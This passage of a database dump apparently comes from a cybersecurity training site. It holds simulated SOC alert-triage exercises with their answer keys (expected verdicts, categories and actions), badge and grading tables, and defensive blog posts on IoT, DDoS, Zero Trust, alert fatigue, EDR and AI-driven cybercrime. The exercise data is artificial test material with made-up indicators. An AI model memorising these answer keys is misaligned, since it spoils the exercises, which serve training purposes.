employee\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"employee_vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account verified to use this VPN regularly\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with a legitimate VPN used by the employee, explaining the foreign login attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (759, 'AWS S3 Bucket Exposed to Public', 'high', 'AWS GuardDuty', 'An AWS S3 bucket has been detected with public read permissions enabled, potentially exposing sensitive data.', 'Data Exposure', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"N/A\",\"username\":\"admin@example.com\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"PUT /public-access-block\",\"command_line\":\"N/A\"}', '2026-01-09 23:33:08', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"admin@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Administrative user account for AWS management\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"PUT /public-access-block\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Documentation\",\"verdict\":\"suspicious\",\"details\":\"Public access block configuration change detected\"}}],\"expected_actions\":[\"close_alert\",\"audit_configuration\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The S3 bucket was configured with public access, posing a risk of data exposure.\"}', 'Novice', 'DLP', 1, 1, 'FINANCE'), (760, 'Multiple Failed Login Attempts Detected', 'medium', 'Splunk', 'A foreign IP address has been detected making multiple failed login attempts to the AWS console.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"N/A\",\"username\":\"j.doe@example.com\",\"hostname\":\"aws-console\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-10 09:16:29', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account for AWS console access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with known malicious activity and attempted unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'), (761, 'Malicious File Executed on Azure VM', 'critical', 'Microsoft Defender for Cloud', 'A known malicious file was executed on an Azure Virtual Machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.4\",\"dst_ip\":\"N/A\",\"username\":\"vm-user\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 15:49:24', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected by 50+ antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious executable\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file executed is a known malicious program, posing a threat to the system.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (762, 'Unusual Spike in Cloud Resource Usage', 'low', 'AWS CloudWatch', 'An unusual increase in compute resources was detected in AWS, suggesting potential crypto mining activity.', 'Anomaly', 'T1496', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"resource_usage\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"N/A\",\"username\":\"aws-user\",\"hostname\":\"aws-ec2-instance\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-11 03:05:12', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud instance\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"aws-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"AWS user account managing the instance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The increased resource usage is attributed to a legitimate workload spike by the user.\"}', 'Novice', 'CLOUD', 1, 1, 'FINANCE'); -- -------------------------------------------------------- -- -- Table structure for table `alert_grades` -- DROP TABLE IF EXISTS `alert_grades`; CREATE TABLE `alert_grades` ( `id` int(11) NOT NULL, `alert_id` int(11) NOT NULL, `user_id` int(11) NOT NULL, `grade` int(11) DEFAULT NULL, `feedback` text DEFAULT NULL, `graded_by` int(11) DEFAULT NULL, `created_at` timestamp NOT NULL DEFAULT current_timestamp(), `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci; -- -------------------------------------------------------- -- -- Table structure for table `badges` -- DROP TABLE IF EXISTS `badges`; CREATE TABLE `badges` ( `id` int(11) NOT NULL, `name` varchar(255) NOT NULL, `description` text DEFAULT NULL, `icon_url` varchar(255) DEFAULT NULL, `badge_type` enum('path_completion','milestone','streak','special') DEFAULT 'milestone', `criteria` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`criteria`)), `xp_reward` int(11) DEFAULT 0, `created_at` timestamp NULL DEFAULT current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -- Dumping data for table `badges` -- INSERT INTO `badges` (`id`, `name`, `description`, `icon_url`, `badge_type`, `criteria`, `xp_reward`, `created_at`) VALUES (1, 'First Steps', 'Completed your first task in the learning path', NULL, 'milestone', NULL, 50, '2025-12-26 00:33:07'), (2, 'Linux Novice', 'Completed the Linux Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'), (3, 'Windows Explorer', 'Completed the Windows Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'), (4, 'Network Navigator', 'Completed the Networking Essentials module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'), (5, 'Security Foundations', 'Completed the Pre-Security Fundamentals path', NULL, 'path_completion', NULL, 500, '2025-12-26 00:33:07'); -- -------------------------------------------------------- -- -- Table structure for table `blog_posts` -- DROP TABLE IF EXISTS `blog_posts`; CREATE TABLE `blog_posts` ( `id` int(11) NOT NULL, `title` varchar(255) NOT NULL, `slug` varchar(255) NOT NULL, `content` longtext DEFAULT NULL, `excerpt` text DEFAULT NULL, `featured_image` varchar(1024) DEFAULT NULL, `featured_image_alt` varchar(255) DEFAULT NULL, `author_id` int(11) DEFAULT NULL, `status` enum('published','draft') DEFAULT 'draft', `created_at` datetime DEFAULT current_timestamp(), `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(), `category` varchar(100) DEFAULT NULL, `seo_title` varchar(255) DEFAULT NULL, `seo_description` text DEFAULT NULL, `focus_keyword` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -- Dumping data for table `blog_posts` -- INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES (1, 'IoT and the Modern Home: How to Stay Safe in a Connected World', 'iot-and-the-modern-home-how-to-stay-safe-in-a-connected-world', '# The Reality of the Connected Home\n\nThe connected home is no longer a futuristic concept—it\'s a reality. From smart locks and thermostats to cameras and refrigerators, the Internet of Things (IoT) has transformed how we live, work, and interact with our environment. However, behind this convenience lies a growing threat: every connected device is a potential entry point for cyberattacks.\n\nToday\'s smart homeowner isn\'t just managing gadgets—they\'re managing risk. Understanding these risks is the first step toward securing what matters most.\n\n## The Rise (and Risk) of the Smart Home\n\nSmart homes promise simplicity: lights that learn daily routines, security systems that respond automatically, and voice assistants that anticipate needs. But the same connections that make life easier can also open digital doors to intruders.\n\nStudies show that up to 80% of consumer IoT devices contain known vulnerabilities, and attacks targeting smart homes increased by more than 100% year over year in 2024. Mass adoption has moved faster than security awareness and regulation.\n\n### Why IoT Devices Are So Vulnerable\n\nMost IoT devices are designed for affordability and convenience, not security. Common issues include default credentials, unpatched firmware, weak or missing encryption, and the lack of unified security standards.\n\nEven basic devices like smart plugs, TVs, and routers can become the weakest link. Once compromised, attackers can move laterally and gain control of the entire home network.\n\n### Real-World Threats from Compromised Devices\n\nSmart home breaches are real and damaging. Hackers have hijacked cameras and baby monitors, exposed private routines through energy data, recruited devices into botnets like Mirai, and permanently disabled hardware through malicious firmware.\n\nEvery connected device can act as both a helper and a hazard.\n\n## Convenience vs. Security\n\nMost users assume smart devices are secure by default, yet the majority report low confidence in IoT security. While many say they would pay more for safer devices, manufacturers still prioritize features and speed to market over security by design.\n\nAs a result, responsibility often falls on users who are least equipped to manage complex security risks.\n\n## How to Secure Your Smart Home\n\nSecuring a smart home does not require expert knowledge. Key steps include:\n\n- Changing default passwords\n- Keeping firmware updated\n- Segmenting IoT devices on separate networks\n- Using WPA3 encryption\n- Enabling multi-factor authentication\n- Choosing reputable manufacturers\n- Limiting unnecessary permissions\n\nSmall, consistent actions significantly reduce risk.\n\n## The Future of Smart Home Security\n\nAI-driven anomaly detection, zero-trust models, blockchain-based authentication, and quantum-resistant encryption are shaping the future of IoT security. Regulatory efforts like the EU Cyber Resilience Act, UK PSTI Act, and U.S. Cyber Trust Mark are improving accountability, while standards such as Matter and ETSI EN 303 645 aim to unify security practices.\n\nStill, education and awareness remain the strongest defense.\n\n## Security Is the True Smart Choice\n\nA connected home can be both convenient and secure, but only with intentional choices. From password hygiene to device selection, every decision impacts safety.\n\nSmart homes represent progress—but without cybersecurity awareness, progress quickly becomes exposure. Protecting your IoT ecosystem ensures your home remains smart in every sense of the word.', '', 'http://infoseclabs.io/uploads/1767472026759-342558123.jpeg', NULL, 1, 'published', '2026-01-03 07:21:00', '2026-01-03 23:27:20', 'IoT Security', 'Securing Your Connected Home: Risks & Solutions', 'Explore the risks of IoT in smart homes and learn effective measures to enhance your home\'s security.', 'smart home security'), (2, 'Understanding DDoS Attacks: Protecting Your Digital Infrastructure', 'understanding-ddos-attacks-protecting-your-digital-infrastructure', '# Understanding Distributed Denial-of-Service (DDoS) Attacks\n\nDistributed Denial-of-Service (DDoS) attacks are among the most severe threats in today’s digital landscape. They can cripple businesses, disrupt critical infrastructure, and prevent users from accessing essential online services. Understanding how these attacks work, the tools attackers use, and how to mitigate them is essential for protecting digital assets.\n\nThis article explains the fundamentals of DDoS attacks, common attack types, attacker tools, and effective mitigation strategies. By the end, you will be able to recognize, respond to, and reduce the impact of DDoS attacks.\n\n## Introduction to DDoS Attacks\n\nA Distributed Denial-of-Service (DDoS) attack overwhelms a target, such as a website, server, or network, with massive traffic. This disrupts normal operations and makes services unavailable to legitimate users.\n\n## Types of DDoS Attacks\n\n### Volumetric Attacks\n\nThese attacks consume bandwidth by flooding the network with large volumes of traffic, blocking legitimate access.\n\n### Protocol Attacks\n\nThese exploit weaknesses in network protocols such as TCP or SYN to exhaust server resources.\n\n### Application Layer Attacks\n\nThese target specific applications or services, overwhelming them with requests until they fail.\n\n## Impact of DDoS Attacks\n\nDDoS attacks can cause revenue loss, reputational damage, reduced user trust, and regulatory penalties. In 2020, AWS mitigated a record-breaking 2.3 Tbps DDoS attack, demonstrating the scale these attacks can reach.\n\n## Common DDoS Attack Methods\n\n### Volumetric Attacks\n\nExamples include UDP floods and DNS amplification attacks that generate massive traffic.\n\n### Protocol Attacks\n\nAttacks such as SYN floods and Ping of Death exploit protocol behavior to crash systems.\n\n### Application Layer Attacks\n\nAlso known as Layer 7 attacks, these include HTTP GET and POST floods targeting web services.\n\n## Tools Used in DDoS Attacks\n\n### Botnets\n\nNetworks of compromised devices controlled by attackers to generate large-scale traffic.\n\n### Stresser Services\n\nPaid services that allow users to launch DDoS attacks under the guise of stress testing.\n\n### Reflection Techniques\n\nAttackers use third-party servers to amplify traffic toward the victim.\n\n## Recognizing a DDoS Attack\n\nEarly detection reduces damage.\n\n### Common Symptoms\n\n- Slow or unavailable websites or services\n- Sudden traffic spikes from unusual locations\n- High network latency\n\n### Detection Methods\n\n- Traffic analysis\n- AI-based anomaly detection\n- Server log analysis\n\n## DDoS Mitigation Strategies\n\nAlthough prevention is difficult, the impact can be reduced.\n\n### Prevention Measures\n\n- Firewalls and intrusion prevention systems\n- Load balancers\n- Content delivery networks (CDNs)\n\n### Traffic Shaping\n\nPrioritizes legitimate traffic over malicious requests.\n\n## Real-World DDoS Case Studies\n\n### GitHub (2018)\n\nA 1.35 Tbps memcached amplification attack mitigated within minutes.\n\n### Dyn DNS (2016)\n\nA Mirai botnet attack disrupted major platforms such as Twitter and Netflix.\n\n### AWS (2020)\n\nA 2.3 Tbps attack highlighted the need for advanced mitigation systems.\n\n## Future Trends in DDoS Attacks\n\n### Increased IoT Exploitation\n\nMore vulnerable devices will expand botnet size.\n\n### AI-Driven Attacks\n\nAI may enable more adaptive and stealthy DDoS techniques.\n\n### Ransom DDoS (RDoS)\n\nAttackers demand payment to stop ongoing attacks.\n\n## Strengthen Your Security Today\n\nDDoS attacks continue to evolve and affect organizations of all sizes. By understanding attack methods, recognizing warning signs, and applying strong mitigation strategies, organizations can significantly reduce their exposure and impact.', '', 'http://infoseclabs.io/uploads/1767474329590-745685715.jpg', NULL, 1, 'published', '2026-01-03 16:01:00', '2026-01-04 00:05:43', 'Information Security', 'Understanding DDoS Attacks & Mitigation', 'Learn about DDoS attacks, methods, tools, and effective strategies to protect your digital assets from one of the biggest online threats.', 'DDoS Attacks'), (3, 'Exploring Zero Trust: Why \'Trust but Verify\' is No Longer Enough', 'exploring-zero-trust-why-trust-but-verify-is-no-longer-enough', '# Understanding Zero Trust Architecture\n\nCybersecurity threats are becoming more sophisticated, and traditional perimeter-based security models are no longer sufficient. Zero Trust Architecture assumes that breaches can happen at any time and requires continuous verification. This shift has changed how organizations protect their digital assets.\n\nThis article explains Zero Trust Architecture, its core principles, implementation levels, and practical tools. It also uses the \"Security Onion\" analogy to simplify the concept.\n\n## Introduction to Zero Trust Architecture\n\nZero Trust is a security model where no user, device, or application is trusted by default, whether inside or outside the network. Every access request must be verified.\n\nIts importance lies in the principle of \"never trust, always verify.\" With cloud services, remote work, and mobile devices, Zero Trust provides layered protection across the entire infrastructure.\n\nTraditional models rely on a secure perimeter, granting broad access once inside. Zero Trust removes this assumption and enforces verification at every step, reducing both internal and external risks.\n\n## Core Principles of Zero Trust\n\n### Never Trust, Always Verify\n\nEvery request must be authenticated and validated before access is granted.\n\n### Least Privilege Access\n\nUsers receive only the access required to perform their tasks, minimizing exposure.\n\n### Assume Breach\n\nOrganizations operate as if a breach has already occurred, enabling continuous monitoring and rapid response.\n\n## Levels of Zero Trust Implementation\n\n### User Identity\n\nStrong identity verification using IAM solutions such as Okta or Microsoft Azure AD.\n\n### Devices and Endpoints\n\nAll devices are verified and monitored using endpoint security tools like CrowdStrike or SentinelOne.\n\n### Network\n\nMicrosegmentation limits lateral movement within the network using platforms such as Illumio or Cisco Secure Workload.\n\n### Applications\n\nApplications are protected with access controls and monitoring tools like Zscaler and Netskope.\n\n### Data\n\nData is secured through encryption, classification, and strict access controls.\n\n## Security Onion Analogy\n\nZero Trust can be visualized as layers of an onion. At the center are people, surrounded by layers including the perimeter, network, endpoints, data, and organizational policies. Each layer strengthens the next, creating a comprehensive defense model.\n\n## Tools and Technologies for Zero Trust\n\n- **Identity and Access Management (IAM)** solutions manage user identities.\n- **Multi-Factor Authentication (MFA)** strengthens authentication.\n- **Microsegmentation** limits network access.\n- **Endpoint Detection and Response (EDR)** provides visibility into device activity.\n\n## Implementing Zero Trust\n\n### Assessment\n\nIdentify assets, risks, and vulnerabilities.\n\n### Planning\n\nDefine a Zero Trust strategy and select appropriate tools.\n\n### Implementation\n\nDeploy controls gradually, starting with critical systems.\n\n### Monitoring\n\nContinuously monitor activity and automate responses.\n\n## Why Zero Trust Is the Future\n\nZero Trust Architecture is essential as cyber threats continue to evolve. It provides proactive, layered security and ensures continuous verification across all systems. Organizations that adopt Zero Trust improve resilience, reduce risk, and prepare for future challenges.', '', 'http://infoseclabs.io/uploads/1767474556038-82386573.png', NULL, 1, 'published', '2026-01-01 00:08:00', '2026-01-04 00:10:27', 'Information Security', 'Exploring Zero Trust: Secure Beyond \'Trust but Verify\'', 'Learn why Zero Trust surpasses \'Trust but Verify\' in cybersecurity, focusing on core principles and practical tools for robust security.', 'Zero Trust'), (4, 'Overcoming Alarm Fatigue: How to Manage Security Alerts Effectively', 'overcoming-alarm-fatigue-how-to-manage-security-alerts-effectively', '# Mastering Security Alarm Management: A Guide to Effective Alert Triage\n\nWhen was the last time your security team investigated an alarm and discovered its actual cause? Security alarms are more than just annoying alerts; they are breadcrumbs along a trail left by potential attackers. Yet, too often, organizations fall prey to the \"cry wolf\" syndrome, becoming desensitized to alarms and missing signs of real danger.\n\nThe stakes couldn’t be higher. Responding to every alarm can overwhelm a team, but ignoring them completely could lead to disastrous consequences. This guide will walk you through the harsh reality of alert fatigue and provide actionable methods for effective triage to ensure you stay vigilant without drowning.\n\n## What is Alarm Fatigue?\n\nAlarm fatigue occurs when security analysts receive an overwhelming number of alarms, leading them to ignore or deprioritize notifications. When you are bombarded by 500 alerts a day, the 501st—the one that actually matters—can easily be lost in the noise.\n\n## The Harsh Reality of the SOC\n\n- **85% of security alerts are false positives**, according to research by the Ponemon Institute.\n- Analysts only investigate **56% of alerts** on average, leaving thousands of potential threats unaddressed.\n- **Burnout is real**: Over 70% of analysts with less than five years of experience face turnover risks due to the high-stress environment of unmanaged alerts.\n\n## A 5-Step Framework for Effective Alert Triage\n\nAs a new professional, you need a repeatable process. Don\'t just \"click through\" alerts—investigate them strategically.\n\n### 1. Smart Alert Grouping\n\nStop investigating alerts in isolation. Use your SIEM or SOAR to cluster related signals—such as multiple failed logins followed by a successful one from the same IP. This transforms \"noise\" into a \"story.\"\n\n### 2. Contextual Enrichment\n\nA raw alert (e.g., \"SQL Injection attempt\") is useless without context. Ask:\n\n- Is the target a critical production server or a test lab?\n- Does the server even run SQL? If not, it’s a low-priority false positive.\n- Is this the user\'s standard behavior or a sudden anomaly?\n\n### 3. Risk-Based Prioritization\n\nNot all alerts are equal. Use a scoring system that considers the criticality of the asset and the severity of the threat. Focus on level 1 (critical) threats first, and handle level 3 (low-priority) during regular business hours.\n\n### 4. Focused Investigation Path\n\nFollow defined Runbooks or Playbooks. For an authentication alert, your path should always include verifying MFA usage and checking IP reputation via tools like VirusTotal.\n\n### 5. The Feedback Loop (Tuning)\n\nThis is the most critical step for a new professional. If you identify a persistent false positive—like a nightly backup script triggering a \"mass file move\" alert—document it and work with your security engineers to tune the rule or set a suppression threshold.\n\n## Professional Advice for Your First 90 Days\n\n- **Automate the Mundane**: Use automation for repetitive tasks like IP lookups and indicator extraction so you can focus on human-centric analysis.\n- **Know Your Baseline**: You can\'t spot an outlier if you don\'t know what \"normal\" looks like in your specific network.\n- **Collaborate**: Don\'t be afraid to ask a senior analyst for a second opinion on complex alerts.\n\n## Conclusion\n\nIgnored alarms mean missed opportunities to stop an attack in its early stages. By implementing a structured triage framework and focusing on alert quality over quantity, you protect not only your organization but also your own professional longevity.', '', 'http://infoseclabs.io/uploads/1767481096256-421379954.jpg', NULL, 1, 'published', '2026-01-04 01:56:00', '2026-01-04 18:03:00', 'Information Security', 'Managing Security Alerts: Overcome Alarm Fatigue', 'Learn strategies to combat alarm fatigue and effectively manage security alerts, ensuring no threat goes undetected.', 'Alarm Fatigue'), (5, 'Why Traditional Antivirus Falls Short in Today\'s Cybersecurity Landscape', '', '# The Evolution of Endpoint Protection: Beyond Traditional Antivirus\n\nCyberattacks are becoming increasingly sophisticated, targeting vulnerabilities with precision and speed. For years, traditional antivirus solutions have been the backbone of endpoint protection. However, as the cybersecurity landscape evolves, so do the tactics of attackers. Today, conventional antivirus software is struggling to keep pace with zero-day exploits and advanced threats. Enter Endpoint Detection and Response (EDR), the next line of defense and perhaps the future of endpoint security.\n\nIn this blog, we’ll explore why signature-based antivirus solutions fall short in combating modern threats and how EDR rises to the challenge with behavior-driven detection. By the end, you’ll understand why it may be time to upgrade your endpoint security strategy.\n\n## The Problem with Traditional Antivirus\n\nFor decades, antivirus software has relied heavily on signature-based detection. But what does that mean, and why is it no longer sufficient?\n\n### How Signature-Based Detection Works\n\nTraditional antivirus tools operate by detecting known patterns or \"signatures\" in malicious files. When a file matches a database of suspicious signatures, it gets flagged and quarantined. This strategy worked exceptionally well in an era when malware evolved slowly, and attacks were less sophisticated.\n\nHowever, modern threats have outgrown this method. Here’s why signature-based detection is falling behind:\n\n- **Zero-Day Exploits:** Cybercriminals exploit vulnerabilities that vendors are unaware of, making signature databases irrelevant in the face of these unknown threats.\n \n- **Polymorphic Malware:** Modern malware can modify its code to avoid detection, rendering signatures ineffective.\n \n- **Sophisticated Attacks:** Hackers now use complex, multi-vector attacks that traditional antivirus cannot analyze comprehensively.\n\nThe result? Relying purely on antivirus creates significant blind spots in your security strategy, leaving your organization vulnerable to evolving threats.', '', 'http://infoseclabs.io/uploads/1767482620674-705801876.png', NULL, 1, 'published', '2025-12-30 10:18:00', '2026-01-04 18:18:06', 'Information Security', 'Overcoming Alert Overload in Cybersecurity', 'Discover how EDR surpasses traditional antivirus in tackling modern cyber threats. Upgrade your security strategy today.', 'Endpoint Protection'), (6, 'Elevate Your Cybersecurity Skills with Kasm Workspaces: A Comprehensive Guide', 'elevate-your-cybersecurity-skills-with-kasm-workspaces-a-comprehensive-guide', '# Kasm Workspaces for Cybersecurity Professionals\n\nThe world of cybersecurity is vast, continuously evolving, and demanding. Whether you\'re a seasoned professional or a budding enthusiast, having the right tools can be a game-changer. One such tool that\'s been making waves in the cybersecurity community is Kasm Workspaces. But what exactly is it, and how can you incorporate it into your home lab to enhance your skills and security? This blog will answer these questions and guide you through using Kasm Workspaces as a cybersecurity professional.\n\n## What is Kasm Workspaces?\n\n### Overview of Kasm Workspaces\n\nKasm Workspaces is a modern, container-based virtual desktop infrastructure (VDI) platform designed to create isolated environments for safe browsing, application deployment, remote work, and more. Unlike traditional VDIs, Kasm Workspaces utilizes lightweight containers, such as Docker, to provide scalable and secure access to virtualized environments.\n\nWhether you need to run a browser in a sandboxed environment, analyze suspicious files isolated from your main machine, or simply access a secure workspace remotely, Kasm Workspaces offers a robust and efficient solution.\n\n### Benefits for Cybersecurity Professionals\n\nFor cybersecurity professionals, Kasm Workspaces checks several critical boxes:\n\n- **Secure Environments:** Create isolated containers to analyze threats, execute potentially malicious files, or browse the web securely without risk to host machines.\n\n- **Lightweight and Scalable:** Unlike resource-heavy VMs, Kasm Workspaces\' containerized approach provides flexibility without high hardware requirements.\n\n- **Centralized Management:** Manage multiple workspaces, configurations, and users from a single dashboard effortlessly.', '', 'http://infoseclabs.io/uploads/1767482767599-980252455.png', NULL, 1, 'published', '2026-01-03 02:26:00', '2026-01-05 00:33:14', 'Projects', 'Kasm Workspaces: Setup Guide for Cybersecurity Pros', 'Discover how Kasm Workspaces enhances cybersecurity home labs with secure, scalable, containerized environments.', 'Kasm Workspaces'), (7, 'The Rise of AI in Cybercrime: Understanding the Threats and Defenses', 'the-rise-of-ai-in-cybercrime-understanding-the-threats-and-defenses', '# The New Frontier: AI-Powered Cyberattacks\n\nThe rapid advancements in artificial intelligence (AI) have revolutionized industries by streamlining processes and creating new opportunities. However, along with its many benefits, AI has also opened a new frontier for cybercriminals. Hackers increasingly leverage machine learning and AI tools to enhance their cyberattacks, making them more sophisticated, effective, and harder to detect.\n\nThis blog delves into how AI is reshaping the cyberattack landscape, provides real-world examples, and offers actionable strategies to defend against this growing threat. If you\'re concerned about how AI is influencing cybersecurity, you\'re in the right place.\n\n## How AI Enhances Cyberattacks\n\nAI adds a dangerous layer of automation, precision, and deception to cyberattacks. Here are some ways hackers are weaponizing machine learning to exploit vulnerabilities.\n\n### Automated Vulnerability Detection\n\nHackers often need to identify weaknesses in a system to stage their attacks. Traditional methods of scanning for vulnerabilities are manual and time-consuming. However, with AI, cybercriminals can now automate this process, allowing them to find weak points in networks, software, or applications much faster.\n\nAI-powered tools analyze large datasets to identify exploitable vulnerabilities and leverage predictive analytics to determine the likelihood of specific attacks succeeding, helping hackers optimize their targets effectively.\n\nFor example, AI can detect unpatched software versions, misconfigured firewalls, or even analyze encryption keys to uncover weaknesses. This automation enables attackers to plot cyberattacks on a scale never seen before.\n\n### Advanced Phishing Campaigns\n\nPhishing, a form of cyberattack where hackers pretend to be legitimate entities to trick users into revealing sensitive information, has been around for years. However, AI has supercharged phishing schemes to become more indistinguishable from real correspondence.\n\nMachine learning enables cybercriminals to create hyper-personalized phishing messages by analyzing social media profiles, email conversations, and public records. AI can craft well-written, contextually appropriate emails that users are far more likely to click on, making these phishing attempts nearly impossible to detect using traditional filters.\n\nAccording to recent studies, 91% of all cyberattacks begin with a phishing email. Now, AI is increasing both the sophistication and authenticity of these scams, putting organizations at greater risk.\n\n### Evasive Malware and Polymorphism\n\nOne of the most dangerous aspects of AI in cyberattacks is the creation of evasive malware. AI-powered malware continuously reconfigures itself to evade detection by security software.\n\nPolymorphic malware, for instance, uses AI to generate new versions of itself with minor variations in its code. These changes render detection tools like signature-based antiviruses obsolete because they cannot recognize new iterations.\n\nWhat\'s worse, AI-powered malware can actively \"learn\" from its environment, adapting its behavior in real-time to avoid detection. It can analyze which types of actions trigger alerts and modify its activity accordingly, ensuring it stays under the radar longer.\n\n## Real-World Examples of AI-Powered Attacks\n\nAI-powered cyberattacks are no longer just hypothetical. They have already made their mark in the real world, with several alarming examples surfacing in recent years.\n\n1. **Deepfake Impersonation Scams** \n Hackers have used AI-generated deepfake audio to impersonate company executives. For instance, in 2019, cybercriminals used deepfake technology to mimic the voice of a CEO, convincing an employee to transfer $243,000 to a fraudulent bank account.\n\n2. **AI-Enhanced Credential Stuffing** \n Credential stuffing involves hackers attempting to gain access by leveraging usernames and passwords leaked from previous data breaches. AI can enhance these attacks by using machine learning to test stolen credentials across hundreds of platforms, identifying successful logins faster than human hackers could.\n\n3. **Sophisticated Chatbot Scams** \n Malicious chatbots powered by AI have been deployed to scam unsuspecting users. These bots can impersonate company representatives, tricking users into providing sensitive information or downloading harmful files.\n\nThese examples demonstrate the deadly potential of AI in the hands of hackers. But what can organizations do to defend themselves?\n\n## Defending Against AI Cyberattacks\n\nWhile the rise of AI-powered cyberattacks is alarming, the good news is that AI is also a powerful ally in cybersecurity. Here’s how organizations can leverage AI to stay one step ahead of attackers.\n\n### AI-Driven Threat Detection Systems\n\nSecurity systems powered by AI are vital in detecting and stopping advanced threats. These systems can process and analyze vast amounts of data in real-time, uncovering patterns or anomalies that traditional tools might miss.\n\nFor example, AI systems like CrowdStrike and Darktrace continuously monitor network traffic for suspicious activity. When a system behaves unusually, such as a sudden spike in outbound data transfers, these tools can flag it and take automated actions to mitigate threats.\n\nAdditionally, AI can provide early warnings about potential attacks by analyzing global cybersecurity trends, enabling organizations to prepare proactive defenses.\n\n### Behavioral Analysis and Anomaly Detection\n\nTraditional cybersecurity methods often rely on static rules, making them susceptible to dynamic threats like AI-powered polymorphic malware. AI solves this problem through behavioral analysis and anomaly detection.\n\nInstead of focusing only on known threat signatures, AI tools observe normal patterns of behavior within a system. Any deviation from the norm triggers alerts, even if the activity doesn’t match a known attack signature.\n\nFor example, if malware disguised as a legitimate application suddenly starts accessing sensitive files, an AI-based security system would flag this as suspicious and isolate the application before any damage is done.\n\n### Proactive Security Measures and Threat Intelligence\n\nThe key to defending against AI-powered cyberattacks is staying ahead of evolving threats. Organizations need to adopt proactive measures like penetration testing, threat simulations, and regular software updates.\n\nThreat intelligence platforms powered by AI can help businesses identify vulnerabilities before hackers do. These platforms scour the dark web, stay updated on newly discovered exploits, and provide actionable recommendations for patching weak spots.\n\nBy continuously improving their defenses and staying informed about emerging threats, businesses can significantly minimize the risks posed by AI-enhanced cyberattacks.\n\n## The Future of Cybersecurity in the Age of AI\n\nAI is rapidly transforming cybersecurity 